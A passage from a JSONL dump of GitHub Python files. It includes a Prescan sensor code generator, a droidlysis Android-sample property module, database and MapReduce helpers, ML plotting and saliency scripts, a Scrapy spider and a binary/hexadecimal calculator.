output_list.append(output_array)\n\n return output_list","repo_name":"dave-khim/ML_project","sub_path":"model/model_data.py","file_name":"model_data.py","file_ext":"py","file_size_in_byte":6630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"41161542360","text":"#!/usr/bin\n# -*- coding: utf-8 -*-\n# @Time : 7/17/2023 2:09 PM\n# @Team : Siemens Prescan SLS\n# @Author : Yi Yang\n# @Support : prescansls.sisw@siemens.com\n\nfrom sensors.Iss import Iss\nfrom sensors.MetaSensor import Sensor\nfrom ObjectsSensorsParser import ObjectSensors\nfrom rename_api_namespace.simcpp_api import *\nfrom generators.MetaGenerator import Generator, Include\nimport shutil\n\n__load_module__ = [\"IssGenerator\"]\n\n\nclass IssGenerator(Generator):\n sensorName = Sensor.Iss\n\n class SensorInclude(Include):\n def __init__(self, dst: str):\n super().__init__(dst)\n self.include_iss_dependency = False\n\n def generate_codes(self, _object: ObjectSensors):\n if len(_object.objectSensors[IssGenerator.sensorName]) > 0 and not self.include_iss_dependency:\n self.includes += iss_incl\n self.sensorDemux += f'''{sensorDemux_incl_prefix}_Iss.h\"\\n'''\n shutil.copy(f\"{sensorDemux_file_prefix}_Iss.h\", self.dst + \"/simmodel/sensorsdemux\")\n self.include_iss_dependency = True\n\n def __init__(self):\n super().__init__()\n\n def generate_codes(self, _object: ObjectSensors):\n issSensor_prefix = f\"issSensor_{_object.ps_object.name}\"\n issUnit_prefix = f\"issUnit_{_object.ps_object.name}\"\n\n for iss in _object.objectSensors[IssGenerator.sensorName]: # type: Iss\n self.properties += f\"{self.space4}//Add Iss sensor properties\\n\"\n self.properties += f\"{self.space4}{IssSensor} {issSensor_prefix}_{iss.iss.name};\\n\"\n self.properties += f\"{self.space4}{IssSensorUnit}* {issUnit_prefix}_{iss.iss.name}\" + \"{nullptr};\\n\"\n\n # output properties\n self.properties += f\"{self.space4}{uint8_t_vector_ptr} {issUnit_prefix}_{iss.iss.name}_R;\\n\"\n self.properties += f\"{self.space4}{uint8_t_vector_ptr} {issUnit_prefix}_{iss.iss.name}_G;\\n\"\n self.properties += f\"{self.space4}{uint8_t_vector_ptr} {issUnit_prefix}_{iss.iss.name}_B;\\n\"\n\n self.constructor += f\"{self.space4}//Construct Iss sensor properties\\n\"\n self.constructor += f\"{self.space4}{issUnit_prefix}_{iss.iss.name}_R = {uint8_t_vector_ptr_make};\\n\"\n self.constructor += f\"{self.space4}{issUnit_prefix}_{iss.iss.name}_G = {uint8_t_vector_ptr_make};\\n\"\n self.constructor += f\"{self.space4}{issUnit_prefix}_{iss.iss.name}_B = {uint8_t_vector_ptr_make};\\n\"\n\n self.registerUnits += f\"{self.space4}//register Iss sensor units\\n\"\n self.registerUnits += f\"{self.space4}{issSensor_prefix}_{iss.iss.name} = \" \\\n f\"{getIssSensor}(\\\"{iss.iss.name}\\\");\\n\"\n self.registerUnits += f\"{self.space4}{issUnit_prefix}_{iss.iss.name} = \" \\\n f\"{registerIssSensorUnit}(simulation, {issSensor_prefix}_{iss.iss.name});\\n\"\n\n self.steps += f\"{self.space4}//demux Iss outputs\\n\"\n func_space = \" \" * 6\n\n port_R = f\"{issUnit_prefix}_{iss.iss.name}_R\" \\\n if _object.enable_all_ports else Generator.Terminator\n port_G = f\"{issUnit_prefix}_{iss.iss.name}_G\" \\\n if _object.enable_all_ports else Generator.Terminator\n port_B = f\"{issUnit_prefix}_{iss.iss.name}_B\" \\\n if _object.enable_all_ports else Generator.Terminator\n\n self.steps += f\"{self.space4}{sensorDemux}::demux_Iss(\\n\" \\\n f\"{func_space}{issUnit_prefix}_{iss.iss.name},\\n\" \\\n f\"{func_space}//Demux, RGB come in column:\\n\" \\\n f\"{func_space}{port_R}, // ->R (valid)\\n\" \\\n f\"{func_space}{port_G}, // ->G (valid)\\n\" \\\n f\"{func_space}{port_B}); // ->B (valid)\\n\"\n\n self.steps += \"\\n\"\n self.properties += \"\\n\"\n self.constructor += \"\\n\"\n self.registerUnits += \"\\n\"\n","repo_name":"sdlizheng2015/prescansimcppgenerator","sub_path":"generators/IssGenerator.py","file_name":"IssGenerator.py","file_ext":"py","file_size_in_byte":3964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"16246622478","text":"#!/usr/bin/env python3\n\n\"\"\"\n__author__ = \"Axelle Apvrille\"\n__status__ = \"Beta\"\n__license__ = \"MIT License\"\n\"\"\"\n\nimport droidutil\nimport droidconfig\nimport droidcountry\nimport droidsql\nimport json\nimport requests\nimport logging\nimport re\nimport configparser # to import Exodus Privacy trackers\nfrom sqlalchemy.orm import sessionmaker\nimport sqlalchemy.exc\n\nlogging.basicConfig(format='%(levelname)s:%(filename)s:%(message)s',\n level=logging.INFO)\n\n\n# This is where to set whether given fields have\n# a meaning or not for a given file type\napplicability = {'file_size': [droidutil.APK, droidutil.DEX, droidutil.ARM,\n droidutil.CLASS, droidutil.ZIP, droidutil.RAR],\n 'file_small': [droidutil.APK, droidutil.DEX, droidutil.ARM,\n droidutil.CLASS, droidutil.ZIP, droidutil.RAR],\n 'file_nb_classes': [droidutil.APK, droidutil.DEX],\n 'file_nb_dir': [droidutil.APK, droidutil.DEX],\n 'file_innerzips': [droidutil.APK, droidutil.ZIP, droidutil.RAR],\n 'cert': [droidutil.APK],\n 'manifest': [droidutil.APK],\n 'smali': [droidutil.APK, droidutil.DEX],\n 'wide': [droidutil.APK, droidutil.DEX],\n 'arm': [droidutil.APK, droidutil.ARM],\n 'dex': [droidutil.APK, droidutil.DEX],\n 'kit': [droidutil.APK, droidutil.DEX]\n }\n\nclass droidproperties:\n verbose = False\n \"\"\"Extracted properties\"\"\"\n\n \"\"\"Field allocation\"\"\"\n certificate = {}\n manifest = {}\n smali = {}\n wide = {}\n arm = {}\n dex = {}\n kits = {}\n\n def __init__(self, config, samplename='', sha256='', verbose=False, import_exodus=False):\n \"\"\"Properties concern a given sample identified by a basename (to be helpful) and a sha256 (real reference)\"\"\"\n self.config = config\n self.verbose = verbose\n if verbose:\n logging.getLogger().setLevel(logging.DEBUG)\n self.sha256 = sha256\n self.sanitized_basename = samplename\n self.import_exodus = import_exodus\n self.clear_fields()\n\n def clear_fields(self):\n \"\"\"Re-initialize all fields of the object - to default values\"\"\"\n self.file_nb_classes = 0\n self.file_nb_dir = 0\n self.file_size = 0\n self.file_small = False\n self.filetype = droidutil.UNKNOWN\n self.file_innerzips = False\n\n self.certificate.clear()\n self.certificate = {'av': False,\n 'algo': None,\n 'debug': False,\n 'dev': False,\n 'famous': False,\n 'serialno': None,\n 'country': droidcountry.country['unknown'],\n 'owner': None,\n 'timestamp': None,\n 'year': 0,\n 'unknown_country': False\n }\n\n self.manifest.clear()\n self.manifest = {\n 'activities': [],\n 'libraries': [],\n 'listens_incoming_sms': False,\n 'listens_outgoing_call': False,\n 'maxSDK': 0,\n 'main_activity': None,\n 'minSDK': 0,\n 'package_name': None,\n 'permissions': [],\n 'providers': [],\n 'receivers': [],\n 'services': [],\n 'swf': False,\n 'targetSDK': 0\n }\n\n # automatically adding smali properties. \n self.smali.clear()\n self.smaliconfig = droidconfig.droidconfig(self.config.SMALI_CONFIGFILE, self.verbose)\n for section in self.smaliconfig.get_sections():\n self.smali[section] = False\n\n self.smali['packed'] = False # This property is not in conf section as it is deduced from no main activity + loading DEX dynamically\n self.smali['multidex'] = []\n\n # automatically adding wide properties\n self.wide.clear()\n self.wide['app_name'] = None\n self.wide['phonenumbers'] = []\n self.wide['urls'] = []\n self.wide['base64_strings'] = []\n self.wide['apk_zip_url'] = False\n self.wideconfig = droidconfig.droidconfig(self.config.WIDE_CONFIGFILE, self.verbose)\n for section in self.wideconfig.get_sections():\n self.wide[section] = False\n\n # automatically add ARM properties\n self.arm.clear()\n self.armconfig = droidconfig.droidconfig(self.config.ARM_CONFIGFILE, self.verbose)\n for section in self.armconfig.get_sections():\n self.arm[section] = False\n\n self.dex.clear()\n self.dex = {'magic': 0,\n 'odex': False,\n 'magic_unknown': False,\n 'bad_sha1': False,\n 'bad_adler32': False,\n 'big_header': False,\n 'thuxnder': False\n }\n\n # automatically set to False kit properties\n self.kits.clear()\n self.kitsconfig = droidconfig.droidconfig(self.config.KIT_CONFIGFILE,\n self.verbose)\n for section in self.kitsconfig.get_sections():\n self.kits[section] = False\n\n if self.import_exodus:\n self.import_exodus_trackers()\n quit()\n # END OF reinit to default values\n\n def import_exodus_trackers(self):\n # import ETIP Exodus Privacy trackers\n url = 'https://etip.exodus-privacy.eu.org/api/trackers/?format=json'\n logging.debug(f'Importing ETIP Exodus trackers from {url}')\n r = requests.get(url)\n if r.status_code != 200:\n logging.warning('Cannot download Exodus Privacy trackers: '\n f'{url} responds code={r.status_code}')\n return\n j = json.loads(r.text)\n config = configparser.ConfigParser()\n for tracker in j:\n # remove trailing dots\n code_signature = re.sub('\\.\\|', '|', tracker['code_signature']).rstrip('.').lstrip('.').replace('.', '/').replace('\\/', '/').split('|')\n for sig in code_signature:\n if len(re.sub('[^a-zA-Z0-9/_]', '', sig)) == 0:\n continue\n if self.kitsconfig.is_pattern_present(sig):\n # logging.debug(f'Not adding tracker={tracker[\"name\"]}'\n # f' as pattern={sig} is already present')\n break\n # sanitize name\n name = re.sub('[^a-zA-Z0-9]', '', tracker['name']).lower()\n # if our signature is more generic, nothing to do\n if name in self.kits:\n # our signature is less generic / missing a pattern\n logging.debug(f'name={name} sig={sig} pattern={self.kitsconfig.get_pattern(name)}')\n logging.warning(f'You should add pattern={sig}'\n f' in tracker={tracker[\"name\"]}')\n break\n logging.debug(f'Adding Exodus Tracker: {name}')\n config[name] = {}\n config[name]['description'] = f'{tracker[\"name\"]} (from ETIP Exodus Privacy list)'\n config[name]['pattern'] = '|'.join(code_signature)\n break\n logging.debug('Appending imported trackers '\n f'to {self.config.KIT_CONFIGFILE}')\n with open(self.config.KIT_CONFIGFILE, 'a') as configfile:\n config.write(configfile)\n\n def write(self, sql):\n Session = sessionmaker(bind=sql.engine)\n session = Session()\n sample = droidsql.Sample(sha256=self.sha256,\n sanitized_basename=self.sanitized_basename,\n file_nb_classes=self.file_nb_classes,\n file_nb_dir=self.file_nb_dir,\n file_size=self.file_size,\n file_small=self.file_small,\n filetype=self.filetype,\n file_innerzips=self.file_innerzips,\n manifest_properties=json.dumps(self.manifest),\n smali_properties=json.dumps(self.smali),\n wide_properties=json.dumps(self.wide),\n arm_properties=json.dumps(self.arm),\n dex_properties=json.dumps(self.dex),\n kits=json.dumps(self.kits))\n session.add(sample)\n try:\n session.commit()\n except sqlalchemy.exc.IntegrityError:\n # occurs when the sample with the same sha256 is already in\n logging.debug(\"Sample is already in the database\")\n\n def dump_json(self, filename='report.json'):\n data = {'sanitized_basename': self.sanitized_basename,\n 'file_nb_classes': self.file_nb_classes,\n 'file_nb_dir': self.file_nb_dir,\n 'file_size': self.file_size,\n 'file_small': self.file_small,\n 'filetype': self.filetype,\n 'file_innerzips': self.file_innerzips,\n 'manifest_properties': self.manifest,\n 'smali_properties': self.smali,\n 'wide_properties': self.wide,\n 'arm_properties': self.arm,\n 'dex_properties': self.dex,\n 'kits': self.kits\n }\n if self.verbose:\n print(\"-------------\")\n print(\"Dumping to JSON file {}\".format(filename))\n f = open(filename, 'w')\n f.write(json.dumps(data))\n f.close()\n","repo_name":"cryptax/droidlysis","sub_path":"droidproperties.py","file_name":"droidproperties.py","file_ext":"py","file_size_in_byte":9831,"program_lang":"python","lang":"en","doc_type":"code","stars":206,"dataset":"github-code","pt":"60"} +{"seq_id":"8651151926","text":"from sqlalchemy import *\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker\nimport datetime\n\n\nclass DatabaseHandler:\n def __init__(self):\n self._engine = create_engine('sqlite:///{}'.format(self._db_path))\n self._engine.echo = False # print all sql commands\n self.Base.metadata.create_all(self._engine)\n self._Session = sessionmaker(bind=self._engine)\n self._session = self._Session()\n self.__lastCommitTimestamp = datetime.datetime.now()\n\n def write_to_db(self, object):\n self._session.add(object)\n timestamp = datetime.datetime.now()\n if (timestamp - self.__lastCommitTimestamp).total_seconds() > 60:\n self.flush()\n self.__lastCommitTimestamp = timestamp\n\n def flush(self):\n self._session.commit()\n\n\nclass SimpleDatabase(DatabaseHandler):\n Base = declarative_base()\n\n class DataModel(Base):\n __tablename__ = \"SatoriBikeData\"\n key = Column(Integer, primary_key=True, autoincrement=True)\n id = Column(INTEGER)\n stationName = Column(String)\n availableDocks = Column(INTEGER)\n totalDocks = Column(INTEGER)\n latitude = Column(REAL)\n longitude = Column(REAL)\n statusValue = Column(String)\n statusKey = Column(INTEGER)\n availableBikes = Column(INTEGER)\n lastCommunicationTime = Column(String)\n\n def get_column_names_dict(self):\n colum_dict = self.__table__.columns.keys()\n colum_dict.pop(0)\n return colum_dict\n\n def __init__(self, db_path):\n self._db_path = db_path\n super(SimpleDatabase, self).__init__()\n","repo_name":"dataGeeek/bike-streaming","sub_path":"ingestion-to-db/src/satori_ingestion/helper/database_manager.py","file_name":"database_manager.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"20416345655","text":"#!/usr/bin/env python\n\nimport sys\n\ndef main(argv):\n\tline = sys.stdin.readline()\n\tline = line.split(\":\")\n\tfirst_person_id = int(line[0])\n\tfirst_person_connections = list(map(int, line[1].strip(\"\\n\").split(\",\")))\n\tfirst_person_connections_set = set(first_person_connections)\n\tmax_people = int(first_person_connections.pop(-1))\n\tall_people = set(range(1, max_people +1))\n\tnon_connections = all_people.difference(first_person_connections)\n\tmight_know = []\n\tprobably_know = []\n\tprint(non_connections)\n\n\t# for line in sys.stdin:\n\t# \tline = line.split(\":\")\n\t# \tsecond_person_id = int(line[0])\n\t# \tsecond_person_connections = list(map(int, line[1].strip(\"\\n\").split(\",\")))\n\t# \tnum_people_known = 0\n\n\t# \tfor third_person in second_person_connections:\n\t# \t\tif third_person in first_person_connections:\n\t# \t\t\tnum_people_known += 1\n\n\t# \t\tif second_person_id not in first_person_connections:\n\t# \t\t\tif num_people_known in [2, 3]:\n\t# \t\t\t\tmight_know.append(second_person_id)\n\n\t# \t\t\telif num_people_known >= 4:\n\t# \t\t\t\tprobably_know.append(second_person_id)\n\n\t# \t# logic for printing output\n\t# \tif len(might_know) != 0 and len(probably_know) != 0:\n\t# \t\tmight_know, probably_know = _convert_to_str(might_know, probably_know)\n\t# \t\tprint('%s:Might(%s) Probably(%s)' % (first_person_id, might_know, probably_know))\n\t\t\n\t# \telif len(might_know) != 0 and len(probably_know) == 0:\n\t# \t\tmight_know = _convert_to_str(might_know)\n\t# \t\tprint('%s:Might(%s)' % (first_person_id, might_know))\n\t\t\n\t# \telif len(might_know) == 0 and len(probably_know) != 0:\n\t# \t\tprobably_know = _convert_to_str(probably_know)\n\t# \t\tprint('%s:Probably(%s)' % (first_person_id, probably_know))\n\t\t\n\t# \telse:\n\t# \t\tprint('%s:' % (first_person_id))\n\n# convert to string function\ndef _convert_to_str(might_know = None, probably_know = None):\n\ttry:\n\t\tif might_know is not None and probably_know is not None:\n\t\t\tmight_know = sorted(might_know)\n\t\t\tmight_know = \",\".join(str(value) for value in might_know)\n\t\t\tprobably_know = sorted(probably_know)\n\t\t\tprobably_know = \",\".join(str(value) for value in probably_know)\n\t\t\treturn(might_know, probably_know)\n\t\t\n\t\telif might_know is not None and probably_know is None:\n\t\t\tmight_know = sorted(might_know)\n\t\t\tmight_know = \",\".join(str(value) for value in might_know)\n\t\t\treturn(might_know)\n\t\t\n\t\telif might_know is None and probably_know is not None:\n\t\t\tprobably_know = sorted(probably_know)\n\t\t\tprobably_know = \",\".join(str(value) for value in probably_know)\n\t\t\treturn(probably_know)\n\t\n\texcept Exception as error:\n\t\treturn(error)\n\nif __name__ == \"__main__\":\n\tmain(sys.argv)","repo_name":"kevinbarry7/DS730","sub_path":"Project_1_MapReduce/problem_3/reducer3_1.py","file_name":"reducer3_1.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"70896152832","text":"'''\r\nCreated on 12 ago 2017\r\n\r\n@author: davide\r\n'''\r\n\r\n'''\r\n Computes the derivative wrt y_hat of the log loss function\r\n'''\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nsns.set()\r\n\r\ndef der_log_loss(y_hat, y):\r\n value = -y/y_hat + (1 - y)/(1 - y_hat)\r\n return value\r\n\r\ny = 1\r\ny_hat = np.linspace(0, 1, int(1E3))\r\nl = der_log_loss(y_hat, y)\r\n_ = plt.plot(y_hat, l)\r\n_ = plt.xlabel('y_hat')\r\n_ = plt.ylabel('log loss')\r\n_ = plt.suptitle(\"Derivative of Log loss as a function of y_hat when the truth is 1\")\r\nplt.margins(0.02)\r\nplt.show()\r\n\r\ny = 0\r\ny_hat = np.linspace(0, 1, int(1E3))\r\nl = der_log_loss(y_hat, y)\r\n_ = plt.plot(y_hat, l)\r\n_ = plt.xlabel('y_hat')\r\n_ = plt.ylabel('log loss')\r\n_ = plt.suptitle(\"Derivative Log loss as a function of y_hat when the truth is 0\")\r\nplt.margins(0.02)\r\nplt.show()\r\n","repo_name":"davidedr/Ng-s-Neural-Networks-and-Deep-Learning","sub_path":"src/der_log_loss.py","file_name":"der_log_loss.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"73780621950","text":"import sys\nimport pickle\nimport numpy as np\nimport scipy.misc\nimport scipy.ndimage\nimport theano\nimport utils\n\n\ndef run(filename_in, filename_out):\n # parameters of CNN-VLM model\n model_name = 'vggnet'\n layer_names = [\n 'data',\n 'conv1_2',\n 'conv2_2',\n 'conv3_4',\n 'conv4_4',\n 'conv5_4',\n ]\n directory = './theanomodel'\n filename = (\n '%s/%s_vlm_%s.pkl' %\n (directory, model_name, '_'.join(layer_names))\n )\n\n # parameters of saliency map\n layer_target = 'conv5_4'\n pool_size = 2**4\n pow_ = 0.5\n sigma = 0.03\n\n # load model\n model = pickle.load(open(filename))\n func = theano.function(\n [model['data']],\n model['loss_lm_%s_map' % layer_target]\n )\n img_mean = utils.load_mean_image()\n\n # load image\n img1 = utils.load_image(filename_in, img_mean)\n\n # compute unnaturalness map\n img2 = func(img1[None, :, :, :]).squeeze()\n\n # pow\n img2 = img2 ** pow_\n\n # resize to original size\n img2 = rescale_image(img2, pool_size)\n img2 = pad_image(img2, img1.shape[1:])\n\n # blur\n img2 = scipy.ndimage.filters.gaussian_filter(\n img2,\n (sigma*img2.shape[0], sigma*img2.shape[1]),\n )\n\n # normalize\n img2 = (img2 - img2.min()) / (img2.max() - img2.min())\n img2 = (img2 * 255).astype(np.uint8)\n\n # save\n scipy.misc.imsave(filename_out, img2)\n\n\ndef rescale_image(img, scale):\n return scipy.misc.imresize(img, (scale*img.shape[0], scale*img.shape[1]))\n\n\ndef pad_image(img, shape):\n pad_ud = shape[0] - img.shape[0]\n pad_lr = shape[1] - img.shape[1]\n pad_u = pad_ud / 2\n pad_d = pad_ud - pad_u\n pad_l = pad_lr / 2\n pad_r = pad_lr - pad_l\n img = np.vstack((\n np.zeros((pad_u, img.shape[1])),\n img,\n np.zeros((pad_d, img.shape[1])),\n ))\n img = np.hstack((\n np.zeros((img.shape[0], pad_l)),\n img,\n np.zeros((img.shape[0], pad_r)),\n ))\n return img\n\n\nif __name__ == '__main__':\n filename_in = sys.argv[1]\n filename_out = sys.argv[2]\n run(filename_in, filename_out)\n","repo_name":"hiroharu-kato/cnn_vlm","sub_path":"compute_saliency_map.py","file_name":"compute_saliency_map.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"60"} +{"seq_id":"14239446694","text":"import scrapy\n\nclass StackOverflowSpider(scrapy.Spider):\n name = \"stackoverflow\"\n\n def start_requests(self):\n urls = [\n 'https://stackoverflow.com/questions/tagged/python'\n ]\n\n for url in urls:\n yield scrapy.Request(url=url, callback=self.parse)\n\n def parse(self, response):\n filename = \"test.html\"\n\n with open(filename, 'wb') as f:\n questions = response.xpath('//*[@class=\"fs-body3 grid--cell fl1 mr12 sm:mr0 sm:mb12\"]/text()').get().strip()\n questions = questions[:-12]\n f.write(questions.encode())","repo_name":"nadee13/scrapy","sub_path":"example/spiders/stackoverflow_spider.py","file_name":"stackoverflow_spider.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"12480937112","text":"def continue_func():\n print()\n print(\"Press to continue\")\n print(\"-\"*30)\n input()\n\n# Decimal to Binary\ndef dec_to_bin(dec_num):\n original_num = int(dec_num)\n binary_num = [128,64,32,16,8,4,2,1]\n binary = []\n bin_string = ''\n\n for num in binary_num:\n if original_num >= num:\n original_num -= num\n binary.append(1)\n else:\n binary.append(0)\n\n for original_num in binary:\n bin_string += str(original_num)\n\n return bin_string\n\n# Binary to Decimal Conversion\ndef bin_to_dec(bin_str):\n binary_string = str(bin_str)\n bin_to_list = list(binary_string)\n value = 0\n\n for num in range(len(bin_to_list)):\n digit = bin_to_list.pop()\n if digit == '1':\n value = value + pow(2, num)\n \n return value\n\n\ndef bin_inverse(bin_str):\n output = ''\n neg_output = ''\n\n if bin_str[0] == '0':\n for el in bin_str:\n if el == '1':\n output += '0'\n else:\n output += '1'\n\n add_one = bin_add(output, '1')\n return add_one\n \n elif bin_str[0] == '1':\n sub_one = bin_sub(bin_str, '1')\n for el in sub_one:\n if el == '0':\n neg_output += '1'\n elif el == '1':\n neg_output += '0'\n return neg_output\n\n\ndef bin_add(bin_str_1, bin_str_2):\n max_width = max(len(bin_str_1), len(bin_str_2))\n bin_str_1 = bin_str_1.zfill(max_width)\n bin_str_2 = bin_str_2.zfill(max_width)\n\n output = ''\n carry = 0\n for i in reversed(range(len(bin_str_1))):\n if carry == 0:\n if bin_str_1[i] == '0' and bin_str_2[i] == '0':\n output = output + '0'\n carry = 0\n elif bin_str_1[i] == '1' and bin_str_2[i] == '1':\n output += '0'\n carry = 1\n else:\n output += '1'\n carry = 0\n else:\n if bin_str_1[i] == '0' and bin_str_2[i] == '0':\n output = output + '1'\n carry = 0\n elif bin_str_1[i] == '1' and bin_str_2[i] == '1':\n output += '1'\n carry = 1\n else:\n output += '0'\n carry = 1\n if carry == 1:\n output += '1'\n return output[::-1]\n\n\ndef bin_sub(bin_str_1, bin_str_2):\n max_length = max(len(bin_str_1), len(bin_str_2))\n bin_str_1 = bin_str_1.zfill(max_length)[::-1]\n bin_str_2 = bin_str_2.zfill(max_length)[::-1]\n output = ''\n borrow = 0\n\n for i in range(max_length):\n num1 = bin_str_1[i]\n num2 = bin_str_2[i]\n \n if borrow == 1:\n if num1 == '1':\n num1 = '0'\n borrow = 0\n else:\n num1 = '1'\n if num1 == num2:\n output += '0'\n elif num1 == '1':\n output += '1'\n else:\n output += '1'\n borrow = 1\n\n if borrow == 1:\n return \"Error: Negative Result\"\n\n return output[::-1] \n\n\ndef bin_div(bin_str_1, bin_str_2):\n if bin_sub(bin_str_1, bin_str_2) == \"Error: Negative Result\":\n return \"Error: No fractions allowed\"\n \n output = ''\n result = ''\n\n for i, ch in enumerate(bin_str_1):\n result += ch\n sub_result = bin_sub(result, bin_str_2)\n\n if sub_result == \"Error: Negative Result\":\n output += '0'\n else:\n output += '1'\n result = sub_result\n \n return output\n\n\ndef bin_mul(bin_str_1, bin_str_2):\n output = ''\n\n for i, el in enumerate(reversed(bin_str_2)):\n if el == '1':\n multi_val = bin_str_1 + ('0' * i)\n output = bin_add(multi_val, output)\n\n return output\n\n\ndef hex_to_dec(hex_str):\n final_value = 0\n output = ''\n hex_dict = {\n '0' : 0,\n '1' : 1,\n '2' : 2,\n '3' : 3,\n '4' : 4,\n '5' : 5,\n '6' : 6,\n '7' : 7,\n '8' : 8,\n '9' : 9,\n 'A' : 10,\n 'B' : 11,\n 'C' : 12,\n 'D' : 13,\n 'E' : 14,\n 'F' : 15\n }\n\n for i, el in enumerate(hex_str):\n value = hex_dict[el]\n multiply = value * (16 ** (len(hex_str) - (i + 1)))\n final_value += multiply\n output = str(final_value)\n \n return output\n\n\ndef dec_to_hex(dec_num):\n output = ''\n count = 1\n values = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]\n keys = ['0','1','2','3','4','5','6','7','8','9','A','B','C','D','E','F']\n\n while count != 0:\n floor_div = int(dec_num) // 16\n remainder = int(dec_num) % 16\n index_value = values.index(remainder)\n hex_value = keys[index_value]\n output += hex_value\n dec_num = floor_div\n count = dec_num\n\n return output[::-1]\n\n\ndef hex_to_bin(hex_str):\n hex_dec_conv = hex_to_dec(hex_str)\n print(hex_dec_conv) \n\n dec_bin_conv = dec_to_bin(hex_dec_conv)\n\n return dec_bin_conv\n\ndef bin_to_hex(bin_str):\n bin_hex = bin_to_dec(bin_str)\n dec_hex = dec_to_hex(bin_hex)\n\n return dec_hex\n\n\ndef menu():\n print(\"\")\n print(\" *** Binary Calculator ***\")\n print(\"\")\n print(\"(B)inary to Decimal Conversion\")\n print(\"(Bi)nary to Hexidecimal Conversion\")\n print(\"(D)ecimal to Binary Conversion\")\n print(\"(De)cimal to Hexadecimal Conversion\")\n print(\"(N)egative Binary Conversion\")\n print(\"(H)exadecimal to Decimal Conversion\")\n print(\"(He)xadecimal to Binary Conversion\")\n print(\"(A)dd two Binary Numbers\")\n print(\"(S)ubtract two Binary Numbers\")\n print(\"(M)ultiply two Binary Numbers\")\n print(\" D(i)vide two Binary Numbers\")\n print(\"(Q)uit\")\n print(\"\\n\")\n\n\ndef input_one_check():\n user_input = input(\"Enter the first binary number : \")\n output = ''\n\n if user_input.isnumeric():\n for num in user_input:\n conv_num = int(num)\n if conv_num > 1 or conv_num < 0:\n print(\"Invalid digits, please use 1's and 0's\")\n continue_func()\n main()\n else:\n output += str(num)\n return output\n else:\n print(\"Invalid Binary\")\n continue_func()\n main()\n\n\ndef input_two_check():\n user_input = input(\"Enter the second binary number: \")\n output = ''\n\n if user_input.isnumeric():\n for num in user_input:\n conv_num = int(num)\n if conv_num > 1 or conv_num < 0:\n print(\"Invalid digits, please use 1's and 0's\")\n continue_func()\n main()\n else:\n output += str(num)\n return output\n else:\n print(\"Invalid Binary\")\n continue_func()\n main()\n\n\ndef main():\n while True:\n menu()\n choice = str(input('Enter choice from menu: ')).lower()\n print(\"\")\n if choice == 'b':\n print(\"\")\n bin_input = input(\"Enter Binary Number (8-digits): \")\n data = ''\n\n if bin_input.isnumeric():\n for num in bin_input:\n conv_num = int(num)\n if conv_num > 1 or conv_num < 0:\n print(\"Invalid digits, please use 1's and 0's\")\n continue_func()\n else:\n data += str(num)\n binary_value = bin_to_dec(data)\n print(f\"Decimal value of the entered binary: {binary_value}\")\n continue_func()\n else:\n print(\"Invalid Binary\")\n continue_func()\n elif choice == 'bi':\n bin_hex_input = input(\"Please enter a Binary number to convert: \")\n bin_hex_conv = bin_to_hex(bin_hex_input)\n print(f\"Hexidecimal value of the entered Binary: {bin_hex_conv}\")\n elif choice == 'n':\n negative_input = input(\"Enter in a binary number (0-124): \")\n n_data = ''\n\n if negative_input.isnumeric():\n for n_num in negative_input:\n negative_int = int(n_num)\n if negative_int > 1 or negative_int < 0:\n print(\"Invalid digits, please use 1's and 0's\")\n continue_func()\n else:\n n_data += str(n_num)\n negative_value = bin_inverse(n_data)\n print(f\"Decimal value of the entered binary: {negative_value}\")\n continue_func()\n else:\n print(\"Invalid Binary\")\n continue_func()\n elif choice == 'd':\n num_input = input(\"Enter a Decimal Number (0-255): \")\n if num_input.isnumeric():\n dec_int = int(num_input)\n if dec_int >= 0 and dec_int <= 255:\n dec_str = str(num_input)\n conv_dec = dec_to_bin(dec_str)\n print(f\"Binary value is: {conv_dec}\")\n continue_func()\n else:\n print(\"Decimal number out of range\")\n continue_func()\n else:\n print(\"\\nInvalid Decimal\")\n continue_func()\n elif choice == 'de':\n dec_conv_input = input(\"Enter a Decimal Number (0-255): \")\n\n if dec_conv_input.isnumeric():\n dec_hex_conv = dec_to_hex(dec_conv_input)\n print(f\"Hexadecimal value is: {dec_hex_conv}\")\n continue_func()\n else:\n print(\"Invalid Decimal\")\n continue_func()\n\n elif choice == 'h':\n hex_conv_input = input(\"Please enter a Hexadecimal: \")\n\n hex_dec_conv = hex_to_dec(hex_conv_input)\n print(f\"Your Hexadecimal converted to Decimal is: {hex_dec_conv}\")\n continue_func()\n\n elif choice == 'he':\n hex_input = input(\"Please enter a Hexadecimal to convert: \")\n hex_bin_conv = hex_to_bin(hex_input)\n print(f\"Binary value is: {hex_bin_conv}\")\n continue_func()\n\n\n elif choice == 'a':\n add_one = input_one_check()\n add_two = input_two_check()\n\n binary_addition = bin_add(add_one, add_two)\n print(f\"= {binary_addition}\")\n continue_func()\n elif choice == 's':\n sub_one = input_one_check()\n sub_two = input_two_check()\n\n binary_subtraction = bin_sub(sub_one, sub_two)\n print(f\"= {binary_subtraction}\")\n continue_func()\n elif choice == 'm':\n mul_one = input_one_check()\n mul_two = input_two_check()\n \n binary_multiplied = bin_mul(mul_one, mul_two)\n print(f\"= {binary_multiplied}\")\n continue_func()\n elif choice == 'i':\n div_one = input_one_check()\n div_two = input_two_check()\n\n binary_divide = bin_div(div_one, div_two)\n print(f\"= {binary_divide}\")\n \n continue_func()\n elif choice == 'q':\n print('Good Bye!')\n break\n else:\n 